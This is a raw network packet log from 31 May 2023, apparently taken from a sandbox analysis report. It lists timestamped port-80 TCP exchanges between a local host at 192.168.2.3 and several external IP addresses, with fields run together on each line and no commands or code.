                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.898843050 CEST8049921208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902431011 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902463913 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902482986 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902501106 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902519941 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902538061 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902560949 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902581930 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902601957 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902620077 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902740955 CEST5005480192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.902801991 CEST5005480192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.905005932 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.905041933 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.905143976 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.910794020 CEST8050055162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.912180901 CEST8050055162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.912321091 CEST5005580192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.913752079 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.913779974 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.913950920 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.922702074 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.922732115 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.922768116 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.922810078 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.931535959 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.931571007 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.931665897 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.940363884 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.940397978 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.940455914 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.940500021 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.983994961 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984034061 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984059095 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984086990 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984113932 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984139919 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984162092 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984179974 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984199047 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984216928 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984235048 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984251022 CEST5005480192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984255075 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984288931 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984307051 CEST8050054104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984318972 CEST5005480192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.984348059 CEST5005480192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.991749048 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.991782904 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.991944075 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.991990089 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.995790005 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.995821953 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.995978117 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.996021032 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.003813982 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.003849030 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.004008055 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.004051924 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.005719900 CEST805003796.127.180.42192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.005780935 CEST5003780192.168.2.396.127.180.42
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.011889935 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.011923075 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.012160063 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.019876957 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.019912004 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.020133972 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.027959108 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.027995110 CEST805005374.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.028206110 CEST5005380192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.154231071 CEST4977380192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.155461073 CEST5005680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.239916086 CEST804977393.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.241091967 CEST805005693.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.244833946 CEST5005680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.245318890 CEST5005680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.331115007 CEST805005693.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.331159115 CEST805005693.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.331372023 CEST5005680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.413899899 CEST5005780192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.473679066 CEST5005880192.168.2.396.91.204.114
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.537467003 CEST5000680192.168.2.3193.166.255.171
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.568665028 CEST5001080192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.697671890 CEST8050057157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.697823048 CEST5005780192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.698636055 CEST5005780192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.982548952 CEST8050057157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.051568031 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.070959091 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.071191072 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.071633101 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.090975046 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.105957985 CEST8050057157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.106234074 CEST5005780192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.217433929 CEST80500443.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.217672110 CEST5004480192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243479013 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243530989 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243551016 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243566990 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243726015 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.243765116 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271267891 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271311998 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271332026 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271346092 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271450996 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271531105 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271584988 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271584988 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271651983 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271651983 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271724939 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271775007 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271835089 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271889925 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271956921 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.271994114 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.272068024 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.291884899 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.291932106 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.291945934 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292013884 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292136908 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292155981 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292220116 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292253971 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292332888 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292341948 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292401075 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292459011 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292512894 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292581081 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292629957 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292685986 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292737961 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292824030 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292877913 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292918921 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292974949 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.292999983 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293051958 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293184042 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293236971 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293256998 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293315887 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293339968 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293395042 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293459892 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293509007 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293581009 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293647051 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293648958 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293701887 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293812990 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.293870926 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311749935 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311790943 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311804056 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311870098 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311983109 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.311999083 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312043905 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312108994 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312144041 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312189102 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312217951 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312287092 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312342882 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312392950 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312442064 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312553883 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312607050 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312618971 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312669992 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312735081 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312787056 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312832117 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312885046 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312942028 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.312992096 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313036919 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313086987 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313143969 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313195944 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313309908 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313380003 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313383102 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313433886 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313494921 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313548088 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313617945 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313669920 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313684940 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313743114 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313823938 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313879013 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313924074 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.313975096 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314096928 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314165115 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314220905 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314264059 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314285040 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314330101 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314382076 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314441919 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314456940 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314516068 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314558029 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314619064 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314702988 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314758062 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314764023 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314819098 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314877033 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.314939976 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315073013 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315094948 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315145969 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315184116 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315227032 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315279007 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315336943 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315391064 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315464973 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315527916 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315587997 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315648079 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315700054 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315762043 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315787077 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.315845013 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332024097 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332072973 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332087994 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332107067 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332120895 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332182884 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332310915 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332416058 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332417011 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332503080 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332531929 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332617998 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332791090 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332817078 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332844019 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332855940 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332882881 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.332895994 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333188057 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333214998 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333235025 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333259106 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333287954 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333297968 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333339930 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333390951 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333391905 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333427906 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333467960 CEST805005962.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333518028 CEST5005980192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.333594084 CEST805005962.75.216.137192.168.2.3
